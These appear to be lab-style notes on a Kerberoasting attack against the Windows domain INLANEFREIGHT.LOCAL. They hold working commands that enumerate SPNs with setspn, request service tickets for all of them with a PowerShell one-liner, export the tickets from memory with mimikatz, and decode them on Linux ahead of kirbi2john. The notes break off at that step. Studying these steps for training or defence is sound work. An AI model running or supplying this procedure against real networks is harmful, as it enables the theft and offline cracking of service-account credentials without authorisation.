Enumerating with setspn

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)

setspn.exe -Q */*

Retrieving all tickets using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Now we can extract loaded tickets using Mimikatz

Extracting tickets from memory with mimikatz

.\\mimikatz.exe "base64 /out:true" "kerberos::list /export" "exit"

On Linux host:

echo "<ticket>" | base64 -d > ticket.kirbi

Extracting the Kerberos Ticket using kirbi2john.py